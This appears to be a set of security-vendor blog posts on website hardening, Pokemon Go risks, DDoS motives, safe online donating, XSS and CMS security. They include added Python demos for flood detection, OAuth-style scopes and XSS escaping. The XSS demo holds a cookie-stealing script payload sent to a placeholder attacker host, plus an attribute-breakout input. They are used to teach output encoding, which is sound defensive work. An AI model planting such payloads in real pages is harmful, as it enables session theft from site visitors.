
7 Ways to Expose Your Website to Hackers

So you want to serve up your website for any hacker to break into. Sure, weirdo…who am I to judge?

Here are 7 things you should not do unless you want your website hacked:

Once again, if you’re a sensible human being you really should never find yourself doing any of these things.

1. Ignore Security Updates

They may be a nuisance, but updates patch up newly discovered bugs in software. Not installing updates and patches makes it a lot easier for hackers to compromise your device or web app. If you want your website hacked, ignore all security patches, plugin updates, and updates for CMS services such as WordPress or Drupal.

2. Use as Many Different Features and Plugins On Your Site As Possible

Plugins introduce many new potential vulnerabilities to your website, similar to how adding more windows makes your submarine less seaworthy. Be sure to load up on file uploaders, video players, ad managers, analytics, and whatever else you can cram in, even if you don’t need any of it.

3. Set a Really Dumb Password

Setting your password to something easy like “123456,” the always-clever “password,” or matching your password to your username saves hackers a lot of time. You can also help by using the same password for your computer, e-mail, FTP access, and Ashley Madison account, so that once one is compromised, all of them are exposed.


4. Mismanage Your Website and Its Contributors

Just let security be someone else’s job, and don’t take any notice. Be sure to give your employees or contributors full admin access to your website, and make sure not to update your passwords after they leave. Sooner or later, something bad will happen.

5. Don’t Put Together a Security Incident Response Plan

No need to prepare for the worst when you’re counting on it. What if your site gets disabled, or deleted, or information is leaked? How do you detect it, how do you respond, and how do you disclose it? Those are questions that should be considered by anyone who doesn’t want to get hacked.

6. Don’t Bother Securing Your Domain With SSL

SSL (today, TLS) encrypts communication between a website’s server and a user’s browser, which is especially useful for protecting online transactions and payments. It also thwarts man-in-the-middle attacks, in which an attacker sitting between server and browser can monitor or alter the traffic. So if you want to endanger your customers’ privacy, forget about HTTPS — HTTP is the way to go!

7. Don’t Use a Web Application Firewall

A web application firewall can protect your site against the most common web attacks, including SQL injection and cross-site scripting (XSS), and cloud WAF services also absorb application-layer DDoS traffic. So if you want to make it easier for hackers to overrun your website, the last thing you should do is put it behind a web app firewall like Cloudbric, Imperva, or Cloudflare.


 

This blog post was originally featured on cloudbric.com. Visit their blog for more insight, news, and accessible information on web threats and trends. If you would like to learn more about Cloudbric’s logic-based WAF service, please contact info@cloudbric.com.


Why Hack Pokemon Go? The Saga Continues…

When Pokemon Go launched a few weeks ago, I thought back to my childhood days of watching the show. Little did I know that I would end up this worried about the cyber security issues surrounding the game. A couple of weeks ago, I wrote a post about the game’s authorization problem, which largely concerned iOS devices signing in with Google accounts. This week I want to follow up on this phenomenon, especially as releases in other parts of the world have happened or look imminent.

Pokemon Go, a Hacker’s Paradise

Because the game had a limited release (to the USA and ANZ) rather than a global one, fans around the world were itching to get their hands on it. Hence third-party apps (which are unverified and should be avoided) and mirrored apps began to appear. Third-party applications are not developed by the original developer but by other companies, most of the time to make a profit or gain recognition. Mirrored or cloned applications resemble the original but are most often ploys for installing malware on a device.

While mirrored applications are usually caught fairly quickly by app store security measures, eager users got to them before the security teams did. Sure enough, many of the repackaged Pokemon Go builds circulating for Android were found to be infected with malware that could hand sensitive data to an attacker or even take control of the entire device. For example, DroidJack is a remote access trojan (RAT) for Android that gives the attacker full access to infected devices.

What’s the Response?

(Infographic: Pokemon Go guidelines issued in Japan. Credit: NISC.)

The organizational responses differed greatly. On one hand, Japan responded in an open manner where last week, NISC (National Center of Incident Readiness and Strategy for Cybersecurity) sent out a friendly infographic. Through 9 steps, it reminded people of the guidelines one should follow when playing the game. We won’t go into the translation of all the guidelines, but in particular, #1 (identity issues) and #2 (double checking for third party applications) have to do with cyber security measures.

On the other hand, countries like Malaysia are wondering if barring the game entirely might be a safer method. Last week, a referendum was called for by a well-known journalist from the New Straits Times to keep the game from entering the country. The journalist stated that it was a national concern in terms of the military as well as society as a whole. There are others who have said that the game goes against Islamic religion and could be offensive to the culture.

It’s safe to say that this trend should not be ignored if governments are starting to become involved.

So What’s a Gamer to Do?

Realistically, we’ll continue to see news headlines about the next incident regarding this game. Within cyber security, hackers will continue to target the apps and the users for two reasons. The most obvious answer is that of profit – with a cloned app, hackers can take advantage of eager users and reap financial benefits. The second not-so-obvious reason is that sometimes hackers do it for an adrenaline rush. With a big trend like this where every other headline is about the game, they want their piece of the fame and the recognition. This adrenaline-seeking does not look like it will stop anytime soon. That’s why it’s the responsibility of the user to be careful.

Some might tell you to stop playing. Go get some fresh air. However, let’s not forget that this is a major phenomenon of a game. Literally everyone and their mother is playing it. So what are some realistic things you can do?

Here are my top three tips:

  1. Stay away from third-party applications. Niantic will bring the game to your country soon enough – in fact, it was released in Germany and Japan last week, and it is now available in over 30 countries.
  2. Still keep the authorization issue in mind. As the game becomes more popular, more hackers will target Niantic’s databases. Go to your Google account’s security page, find the application, and check exactly what you have authorized it to access.
  3. Consider a security solution for your mobile device. Look for one that detects malware-infected versions of applications so that infections are prevented in the first place; it’s of little use trying to remedy them after your device has already been infected. If you’re in Korea, you might consider D’Amo, Penta Security’s encryption solution. With a component made for smartphones in its PKI line, it can protect the data on your device.

So let’s have a discussion. What is the current viewpoint of Pokemon Go in your country among the general population? What is your governmental organization doing regarding the potential (physical and cyber) security issues? What are you doing regarding Pokemon Go? 


DDoS Top 6: Why Hackers Attack

Lately, it seems like the companies that haven’t had their web and cyber security compromised are in the minority.

Many are hit hard by web attacks, and in particular we see an increase in DDoS (Distributed Denial of Service) attacks. In a DDoS attack the attacker’s main goal is to make your website inaccessible, usually by using a botnet: an army of connected devices infected with malware. That army floods your website’s server with traffic until it is overloaded and its available bandwidth is exhausted. Much of the time the attack doesn’t breach your data or bypass any security control at all.
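The flood described above shows up in a web server’s access log long before anyone notices the site is slow. The following is an added example, not code from the original post: a sliding-window check that flags client IPs sending more than a threshold of requests in a short window, which is the most basic signal of a flood. The window, the threshold, the IP addresses and the log lines (Apache/nginx “combined” format) are all constructed for the example.

```python
"""Sliding-window request-rate check over web server access logs.

Added example, not code from the original post. It flags client IPs whose
request rate inside a short window exceeds a threshold, the most basic
signal of a flood. Thresholds and the sample log lines (Apache/nginx
"combined" format) are constructed for the example.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return (ip, timestamp, request-line) or None for lines that don't match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("req")


def flag_flooders(lines, window_seconds=10, max_requests=20):
    """Return {ip: peak requests seen in any window_seconds-wide window}
    for every IP whose peak exceeded max_requests.

    Lines must be in log order. Per IP we keep a deque of timestamps no
    older than window_seconds before the newest request, so memory is
    bounded by the window rather than by the log size."""
    windows = defaultdict(deque)
    peak = defaultdict(int)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # skip malformed lines rather than crash mid-incident
        ip, ts, _req = parsed
        recent = windows[ip]
        recent.append(ts)
        while (ts - recent[0]).total_seconds() > window_seconds:
            recent.popleft()
        peak[ip] = max(peak[ip], len(recent))
    return {ip: n for ip, n in peak.items() if n > max_requests}


def make_sample_log():
    """Constructed sample: one client browsing normally (5 hits in a minute)
    interleaved with one client hitting /login 50 times in 5 seconds."""
    base = datetime(2016, 7, 20, 12, 0, 0, tzinfo=timezone.utc)
    hits = [(i * 12.0, "203.0.113.10", "/index.html") for i in range(5)]
    hits += [(i * 0.1, "198.51.100.7", "/login") for i in range(50)]
    hits.sort()
    lines = []
    for offset, ip, path in hits:
        stamp = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
        lines.append(f'{ip} - - [{stamp}] "GET {path} HTTP/1.1" 200 512 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for ip, n in flag_flooders(make_sample_log()).items():
        print(f"{ip}: {n} requests within 10 s")
```

Run it against a real log by replacing `make_sample_log()` with the lines of `access.log`. A per-IP counter like this catches a single noisy source; a true distributed attack spreads the same load across thousands of bots, each under the threshold, which is why the detector should also track the total request rate and why a WAF or upstream scrubbing service is needed to absorb it.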

So if it’s not to breach your data, why would someone go through the effort to shut down your website? There are a multitude of reasons, but today we’ll look at the top 6 reasons for a Distributed Denial of Service Attack.

1. Some (not-so) friendly competition

As more and more enterprises are taking their storefronts to the cyber world – there is also competition within the cyber world.

In fact, in a recent survey nearly half the responding businesses said that they believed that their competitors were launching DDoS attacks in order to disrupt services. After all, if your competition’s website is down, all the traffic will come to your website instead. Additionally, your competition’s brand image is tarnished, giving positive associations to your company instead.

Even if an entrepreneur may not be skilled in hacking, DDoS attacks are now available for hire, and attacks can be executed for a fairly low price on the dark market.

2. DDoS for Hacktivism

As we’ve noted, DDoS attacks aren’t necessarily about taking data. It can be used to strongly voice an opinion – any opinion. Voicing your opinion on the Web can have a bigger and faster effect than if you were to attend an in-person rally or strike. DDoS is often used to show support or opposition regarding a certain topic. It could be political (see below), but also for/against businesses or banks, ethical concerns, or even an online game.

3. All about politics

A subset of reason #2, DDoS attacks can also happen between countries or governments. The Web is the newest battlefield. DDoS attack victims can be government websites. While the sites could have been attacked by apolitical hackers, many do believe that governments or political parties often attack each other using the DDoS method.

As most governments rely on the Web to communicate and run their country, this has proven to be an effective method to show political opposition.

4. Seeking their revenge

An extremely common reason for DDoS attacks, this situation could apply to businesses, individuals, as well as governments. Not necessarily to give an opinion, attacks are used to seek revenge on your enemy. There’s no need to get your hands dirty at all.

For example, there have been increasing instances of previous employees hiring DDoS attacks on the dark market to seek revenge on their former employers. We’ve previously written on internal data breaches by present or past employees, but this is yet another form of when one person holds a grudge and it affects an entire company.

5. A precursor for something bigger

On New Year’s Eve of 2015, BBC was reportedly attacked with a DDoS attack measuring over 600 Gbps, beating out the previously set record of 334 Gbps. The attackers who claimed responsibility, New World Hacking, said that it was simply “testing.” More recently, the hacking group PoodleCorp took responsibility for shutting down the trending Pokemon Go game using the DDoS attack and they claimed that they were also testing for something on a larger scale.

A hacker may be preparing for something new like the above two cases, or they may be using the attack as a distraction for a larger attack, hoping that they won’t be found out. This is one case where the attack may be used indirectly for a security breach.

6. Some plain ol’ fun?

And lastly, sometimes there’s really no rhyme or reason to why DoS or DDoS attacks happen.

There’s a misconception that there is a specific reason behind all attacks. However, this is simply not the case. Many hackers get an adrenaline rush from hacking into a system or a website, no matter how big or how small it may be.


Therefore, there’s the responsibility as the individual user or as the CIO/CTO of a company to ensure that security measures are being taken. One needs to prepare for an attack because no one is ever exempt from the chances of an attack.

So what are these security measures I speak of? In my opinion, the most essential step you can take is to protect yourself with a WAF (Web Application Firewall). By using WAF services like Cloudbric or a WAF like WAPPLES, you can make sure your website is continuously protected.

For more information on Cloudbric (full service website security provided for free if your website’s bandwidth is under 4GB/month), check out their website and find out more about WAPPLES, the WAF they use for their service.


Authorization, Authentication, and Pokemon-Go

When I opened up my news feed last week, 80% of the updates and news headlines were about the phenomenon that is Pokémon-Go.

For those of you that have no idea what this is, Pokemon-Go is a game made by Niantic, which started as an internal startup within Google. Within the game you use AR (augmented reality) to catch, battle, and train Pokémon (fictional animals, or “pocket monsters”) throughout the real world.

The game has millions of users on both Android and iOS devices, and the numbers will continue to increase. This isn’t surprising as much of the millennial population grew up watching the cartoon, playing the video game, and collecting the merchandise like there was no tomorrow.

Despite the excitement of it all, unfortunately, some issues have come up as there have been muggings by criminals at popular game meetup locations and trespassing at memorial sites like the Holocaust museum. Furthermore, the story has taken a new turn as it has now stepped into the realm of cyber security.

The Authorization Problem

The (potentially catastrophic) problem of this game is regarding Authorization and Authentication. These two concepts are often mixed up, but let’s explore them a bit within the context of the game itself.

Authentication verifies who you are: that the person signing in actually controls the account. Authorization decides what the application is allowed to do with that identity. In this game, after you authenticate, the application asks you to authorize Niantic to access your account information. That authorization happens just once, but it determines how much information you are granting the application for as long as the grant lasts.

So the problem for this game ultimately lies in the authorization. You can sign in two ways within the application: through a pokemon.com account or through your Google account. Normally, Google shows you the permissions the application is requesting before you approve them. Before July 12, however, signing in with your Google account skipped that screen entirely: clicking the button took you straight to the log-in page, and full account permissions were handed over automatically, meaning all of the information tied to your Google account was made accessible to Niantic.
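The split between the two steps, and why the scopes approved at consent time matter more than the login itself, is easier to see in code. The block below is an added example, not Niantic’s or Google’s code: a user authenticates with a password, the application is then issued a grant limited to the scopes the user consented to, and every later read is checked against that grant. The scope names, the fields they unlock, the account store and the sample account are all hypothetical.

```python
"""Authentication versus authorization, as an added example that is not
Niantic's or Google's code. Authentication proves who the user is; authorization
decides what a third-party app may do with that identity, and it is the scopes
granted at consent time that bound the damage if the app's database is later
breached. The scope model, account store and sample data are hypothetical.
"""
import hashlib
import hmac
import os
import secrets

# Hypothetical mapping from a consent scope to the account fields it unlocks.
SCOPE_GRANTS = {
    "profile": {"name", "email"},
    "full": {"name", "email", "address", "payment_card", "mailbox"},
}


def _hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def create_account(store, username, password, data):
    """Store a salted PBKDF2 hash, never the password itself."""
    salt = os.urandom(16)
    store[username] = {"salt": salt, "hash": _hash_password(password, salt), "data": data}


def authenticate(store, username, password):
    """Authentication: does the caller control this account?"""
    acct = store.get(username)
    if acct is None:
        _hash_password(password, b"\0" * 16)  # spend the same time for unknown users
        return False
    return hmac.compare_digest(acct["hash"], _hash_password(password, acct["salt"]))


def authorize_app(store, username, password, app, scopes):
    """Authorization: after a successful login, mint a grant limited to the
    scopes the user consented to. This is the one-time step the article
    describes; the grant, not the password, is what the app keeps."""
    if not authenticate(store, username, password):
        return None
    unknown = set(scopes) - set(SCOPE_GRANTS)
    if unknown:
        raise ValueError(f"unknown scopes requested: {sorted(unknown)}")
    return {"token": secrets.token_hex(16), "user": username,
            "app": app, "scopes": frozenset(scopes)}


def fields_exposed(grant):
    """Every account field the grant can reach."""
    return set().union(*(SCOPE_GRANTS[s] for s in grant["scopes"]))


def read_field(store, grant, field):
    """Per-request check: the app sees a field only if a granted scope covers it."""
    if field not in fields_exposed(grant):
        raise PermissionError(f"{grant['app']} has no scope covering {field!r}")
    return store[grant["user"]]["data"][field]


def demo():
    """Constructed account; compare a 'full' consent with a 'profile' one.
    Returns (fields a full-scope app can read, fields a profile-scope app can read)."""
    store = {}
    create_account(store, "trainer", "correct horse battery staple", {
        "name": "Ash", "email": "ash@example.com", "address": "1 Pallet Town",
        "payment_card": "4111 **** **** 1111", "mailbox": "[...]"})
    full = authorize_app(store, "trainer", "correct horse battery staple", "game-app", ["full"])
    limited = authorize_app(store, "trainer", "correct horse battery staple", "game-app", ["profile"])
    return fields_exposed(full), fields_exposed(limited)


if __name__ == "__main__":
    full, limited = demo()
    print("full scope exposes:   ", sorted(full))
    print("profile scope exposes:", sorted(limited))
```

The same password check succeeds in both calls to `authorize_app`; only the scopes differ, and that single difference decides whether a breach of the app’s data store exposes a payment card and a mailbox or just a name and an e-mail address. This is the check to make on the consent screen, and the reason the article’s advice to review what you have authorized is worth following.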

“Well, I’m just going to play the game. So it should be ok.”

But this kind of mindset is why it’s so dangerous to buy into the trend. The reality is, because this is your Google account, your account may contain payment information, your address, and your passwords. Millions have signed off their information to the application, and thus the database is now becoming a prime target for hackers.

Did Niantic mean for this to happen? Probably not – it was an oversight, and the error was corrected on July 12. The application now requests limited permissions, so it only receives your basic information. If you download the application now, you get this:

(Screenshot of the current, limited permission request omitted.)

But the game isn’t over, because wherever there is data of any kind (even limited data), there is value. The game has 10 million accounts now, and some experts have claimed that once it reaches 20-25 million records a data breach is only a matter of time.

So, Pokemon Go or No?

Realistically, people will continue to play the game, and it’s likely to make its way into other parts of the world. What can you as the player/user do to protect your information?

First, be aware of the authorization you’re granting applications when following this kind of phenomenon. When an application first comes onto the scene, there’s a lot that can go wrong. It may have vulnerabilities that have yet to be discovered, and malware-infected versions that have been released.

Second, ask for transparency as the user. Any company, especially one that requires so much of your information, should openly state what security measures it is taking. As stated before, Niantic probably didn’t mean for this to happen. However, as AR and VR (virtual reality) are becoming increasingly prevalent within technology, more and more companies may inadvertently or intentionally seek higher levels of permissions in order to access your information. However, when society as a whole demands transparency, this can be mitigated to a significant degree.

Lastly and perhaps most importantly, stay safe in real life. Augmented reality, virtual reality – none of it matters if you’re not aware in physical reality of what’s going on.


Visit www.pentasecurity.com for more information on other web and data security products, news, and blog posts.


Think Twice Before Donating Online

Donating Online From a Security Perspective

Have you ever made a donation? It’s a good feeling to help somebody out. Based on the National Philanthropic Trust’s data, Americans gave $358.38 billion in 2014, and that figure continues to increase yearly. We usually donate in person at a store, school, or workplace, but the internet has made donating online a lot easier. However, we should take some precautions before making these donations.

Although not as large as Kickstarter.com or GoFundMe.com, it’s pretty simple to make a website to receive funding. Communities can create a website to donate to schools. Families can make a site to receive donations to pay for the funeral costs for the death of a loved one. With a giving heart, we usually donate a few bucks to help them out. But, we really should think twice before donating online.

According to Bloomberg, Bank of America spent over $400 million in 2014 to protect their online customers. Large corporations have their own security team to protect their websites, but what about the smaller companies that help people? Clearly, a school does not have $400 million to protect their donation website from web attacks. A person asking for money is not likely to put money into security for their website.


Although donating online can be a simple and efficient way to help somebody out, it has some negative consequences if it is done negligently. Would you give your wallet full of cash to a bank that’s not protected? Donating money to an unprotected website can not only take away your money, but your personal information can be leaked as well. Your personal information like your name, address, and phone number, but also your credit card information and bank account information can all be consequentially leaked.

I’m not saying do not donate online completely. Donation websites are for a good cause. If you really want to donate for a certain cause, there are safety measures you can take to avoid any dangers.

1. Make Sure It Is a Trusted Organization or Someone You Know Personally

There are many fraudulent donation campaigns to make a quick profit and run, so make sure it is genuine. Verify their address or phone number if it looks suspicious.

2. Check the URL Box and See If It Says “https”

The extra ‘s’ stands for ‘secure,’ and when you deal with money or personal information, the connection should always be secure. Another tip is to check for the “lock” icon in your browser, located next to the URL. Clicking it shows more information about the certificate and the connection. In Google Chrome the lock indicates the state of the connection: a green lock means the certificate is valid and the connection is encrypted, a site with an EV (Extended Validation) certificate additionally shows the verified organization name next to it, and a red or crossed-out lock means the certificate failed verification. Note that EV means the organization’s identity was vetted more strictly; it does not mean the encryption is stronger.

3. Send a Message to the Website Administrator

Ask if the website is secured with a web application firewall. Website protection solutions like Cloudbric provide comprehensive website protection for free up to 4GB traffic usage, which makes it more than enough for donation sites to be fully protected without paying a penny.

All of these methods should be checked before you type in your credit card number. It’s always great to give, but make sure you are protecting your wallet as well.



XSS: The Con-Artist

“XSS” is an acronym you hear often in the field of information security. It’s a relatively common attack for both the client and the server. Acronyms can make you think that it’s a bit more hi-tech and complicated than it really is. But at the root of it, XSS is basically a con-artist, waiting for his next ploy.

What is XSS?

Short for Cross-Site Scripting, this web vulnerability is a type of injection in which the attacker gets script (often JavaScript) into a page served by a trusted site. Because the application fails to sanitize or encode that input, the victim’s browser executes the script as if it were part of the site’s own code, with the site’s origin and the user’s session.

There could be a variety of consequences: It could alter the display, modify the browser, or even steal your session cookie and sign in as an administrator, which could give complete control over to a hacker.

But I use the word “could” because there’s a lot of variety and uncertainty when it comes to the XSS vulnerability: what the consequences can be, when they can happen, and to what extent they reach. So let’s make it a bit easier to process.

Think of the XSS vulnerability as a con artist’s latest trick. You never go out looking for a con-artist, but some way or another, they get you right where they want you.

Non-Persistent XSS: the Pickpocket Scam

Pickpocketing is the oldest trick in the book, proven to work time and time again. It’s become a common and simple way for attackers to get their target. The pickpocket may approach you as the “nice stranger” who’s asking for directions on the street. But their hand reaches to take your wallet from your pocket while you’re explaining directions. Though the pickpocket targeted you, when the ordeal is done and your money is gone, it’s as if it never happened.

(Diagram: non-persistent XSS flow.)

It’s the same with Non-Persistent (reflected) XSS, the most common type. An attacker crafts a link to the vulnerable site whose parameters carry the malicious script, and delivers it to a target. You click it and fall for the trap. The payload does pass through the server, but, as with the pickpocket, nothing is left behind: the website simply echoes the script back into the page it returns to your browser, the script runs there, and your cookies go to the attacker. Immediacy and the lack of any lasting trace are the hallmarks of non-persistent XSS attacks.

Persistent XSS: The ATM Skimmer

On the other hand, Persistent XSS is much less common. While it has the potential to cause more significant damage, it can also be found and remedied more quickly. Think of an ATM skimmer, an electronic device placed inside or on top of an ATM that captures whatever a customer enters. The skimmer looks just like the ATM the customer uses every day, but it copies every card number and PIN and relays them to the con-artist. It’s not targeted, so everyone who uses the ATM is affected without discrimination.

Like the ATM skimmer, the website looks the same as it usually does after the malicious script has been injected. The script is saved by the server (in a comment, a profile field, a forum post) and then displayed on normal pages, so every user browsing the website is exposed to the XSS, and they are hit again on every page load. This is why this type of XSS vulnerability is much more dangerous: damage can be done to a far wider set of users without anyone noticing anything amiss.

(Diagram: persistent XSS flow.)

Fortunately, because this type of XSS takes place on a server – if someone is able to spot the unwelcome script, it can be remedied. In the case of the skimmer, perhaps the ATM maintenance crew notices that there is a bar code missing, or a warranty seal that’s in the wrong place. They can take quick and urgent steps to make sure that the skimmer is removed.
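Both cons above, the pickpocket (non-persistent) and the skimmer (persistent), come down to the same coding mistake and the same fix. The block below is an added example, not code from the original article: a tiny server-side renderer echoes a search term (reflected) and a list of saved comments (stored), first splicing raw input into the HTML and then passing it through `html.escape`. It also shows the attribute-context case, where a single quote character is enough to break out without any `<script>` tag. The payload, the comments and the attacker host are constructed for the example.

```python
"""Reflected and stored XSS next to the fix, as an added example that is not
from the original article. A tiny server-side renderer echoes a search term
(the reflected case) and a list of saved comments (the stored case). The
vulnerable versions splice raw input into HTML; the fixed versions pass it
through html.escape so the browser treats it as text. Payloads, comments and
the attacker host are constructed for the example."""
from html import escape

# Classic cookie-theft payload; attacker.example is a placeholder host.
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def render_search_vulnerable(term):
    """Reflected: the query parameter goes straight back into the response."""
    return f"<h1>Results for: {term}</h1>"


def render_search_fixed(term):
    """escape() converts < > & " ' to entities, so the payload is displayed, not run."""
    return f"<h1>Results for: {escape(term, quote=True)}</h1>"


COMMENTS = []  # stand-in for the database table that makes stored XSS persistent


def post_comment(text):
    COMMENTS.append(text)


def render_comments_vulnerable():
    """Stored: every visitor gets the saved payload, on every page load."""
    return "<ul>" + "".join(f"<li>{c}</li>" for c in COMMENTS) + "</ul>"


def render_comments_fixed():
    return "<ul>" + "".join(f"<li>{escape(c, quote=True)}</li>" for c in COMMENTS) + "</ul>"


def render_avatar_vulnerable(alt_text):
    """Attribute context: an input containing a quote can close the attribute
    and add an event handler, with no <script> tag at all."""
    return f'<img src="/avatar.png" alt="{alt_text}">'


def render_avatar_fixed(alt_text):
    # quote=True (the default) is what keeps " from terminating the attribute.
    return f'<img src="/avatar.png" alt="{escape(alt_text, quote=True)}">'


def has_live_script(html_out):
    """Crude check used in the tests: does the output contain an unescaped <script tag?"""
    return "<script" in html_out.lower()


if __name__ == "__main__":
    print(render_search_vulnerable(PAYLOAD))
    print(render_search_fixed(PAYLOAD))
    post_comment("Great game!")
    post_comment(PAYLOAD)
    print(render_comments_fixed())
    print(render_avatar_fixed('" onerror="alert(document.cookie)'))
```

Output encoding has to match the context the data lands in (element body, attribute, URL, inline script), which is why template engines that escape by default are safer than hand-built strings. As a second, independent layer, setting the session cookie with the `HttpOnly` flag keeps `document.cookie` from reading it, so even a script that does run cannot steal the session the way the payload above tries to.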

XSS Exploits in Real Life

XSS-affected websites can suffer from a variety of issues. Unfortunately, websites with a large number of active users are often affected through both persistent and non-persistent XSS. Recently, a Persistent XSS vulnerability was found on PayPal’s website. This would have allowed for hackers to inject code resulting in a malicious payload, potentially opening up attacks for its 150 million customers. Thankfully, the company was notified of the vulnerability before any negative impact. But of course, there are companies that aren’t so lucky.

Hackers will always find popular websites, big or small, to execute their attacks, so what can you do to protect your website?

  • Source Code Analysis: Source code analysis tools find security flaws by going through the source code line by line. Ideally, this tool is used before the website goes live, so problems can be remediated before any issues arise.
  • Vulnerability Scanners: There are security scanners that will identify vulnerabilities like XSS. Although they’re not perfect (because they’re not optimized for your website or application specifically), they can allow you to find the most obvious vulnerabilities to clean up.
  • Web Application Firewall: Web Application Firewalls or WAFs follow rule-sets to detect or block anything suspicious. WAFs will normally prevent attacks such as XSS and SQLi as part of their rule-set. Make sure that your WAF is one that has low false positive rates. That’s it! You’re well on your way to having a safer, cleaner website.

Which method is the most effective? As I always say, there’s no perfect way to escape any form of web attack. But the best thing you can do is follow the points above like a process. Source code analysis tools will scan for flaws before anything goes live. Vulnerability scanners will then look for further issues as the website is up. A WAF will block the attempts that manage to slip through the cracks. Unfortunately, nothing is foolproof. But risk can always be reduced and controlled.


“Website” Meaning for Startup CEOs?

You might hear a lot of CEOs saying, “My website is powered by WordPress”, “My website is everything”, or “My website is my entire business!” These are the most common answers from CEOs. Almost all startups operate their own websites. Many startup CEOs build their websites with CMS tools such as WordPress, Joomla, or Drupal. Those that depend on these tools really need to pay attention to what these are, if they have any hope to do business online.

Well, the formal definition of a website is a connected group of pages on the Internet reached through unique addresses and network routes based on Internet protocols. But who can actually understand this kind of explanation? A website is web data: web pages and their contents. To get a better understanding of what a website really is, we can start by knowing more about CMS. A web content management system, or CMS, is a tool that turns raw content into useful resources, and it is the leading way to build a website without difficulty. How a website is protected can differ completely depending on the beliefs of the startup CEO: one CEO may want to protect a site one way, another may think differently and protect it another way. It all depends on their definition of what a website is to them. Here is a closer look at common assumptions CEOs have about websites.

1. ‘My website is powered by CMS’

CMS platforms and their plugin modules are tools for building and operating websites. Security is built into an application through secure coding, but secure coding is never perfect. That’s why CMS vendors release security patches and updates, and users need to apply them promptly. Even then, a website can still be hit by ‘zero-day attacks’: exploitation of a bug during the window before the CMS vendor knows about it and has shipped a fix.

The point here is that, not limited to CMS services themselves, users also need to pay attention and double-check every module to see whether it is really safe or not. Modules should only be downloaded from reliable, trustworthy websites. It can be quite bothersome to constantly update and still be vulnerable to attacks.


2. ‘My website is all the data stored in the data center’

Technically, this is a pretty close answer. A website is data, and website data is stored at an Internet data center, IDC for short. To keep that data safe, the data center administrator manages network firewalls and network security tools such as IDS/IPS to keep hackers, viruses, and malicious code out of the data center.

Enterprises can usually afford to directly manage their own web server in the data center. But most startups can’t do this, so they rely on their hosting services to manage it for them with a lease of a partial web server in the data center. Cloud hosting services are popular among both small and medium businesses and larger enterprises. But if users rely on a cloud hosting service such as AWS, they have no control over data center security. The data center will probably be safe, but that security is built around the server, not around the individual websites.

3. ‘My website is my own private data with web pages’

This is how startup CEOs should perceive their website. Understanding this concept is important because among security attacks on information, 90% are aimed at content, through content. Compared to the vulnerabilities of the CMS and of physical data storage, content vulnerability is a more serious matter. Website attacks are directed at the contents of a website, and those contents are not just images or files: they include account information and administrative authority.

So, how can startup CEOs with CMS protect their websites?

Websites to a business can take on a completely different meaning from the average user. Startup CEOs might view a website as their gateway to the outside world. It is their vehicle to communicate their business and sell products. In essence, a website is a business. Most websites are powered by CMS systems, and since a site owner cannot realistically audit how securely the CMS and every plugin have been coded, they need to constantly apply the security patches the CMS provides to avoid attacks like SQL injection. Even then the site is not completely safe, so CEOs need a web application firewall that covers the gaps in the CMS’s own security measures.

Even if a cloud-hosting service protects the web server or its data center, it does not protect the contents of individual websites. Basically, the data center manages the antivirus role and the network security role, but it does not take the web contents security role. Technical and privacy issues restrict it from securing web content.

A web application firewall (WAF), on the other hand, can fully protect website content. The cloud-based web application firewall Cloudbric can protect your website. Even if your data is stored safely on an IDC, or if you update security patches constantly on CMS, you still need a WAF to fully protect your website.

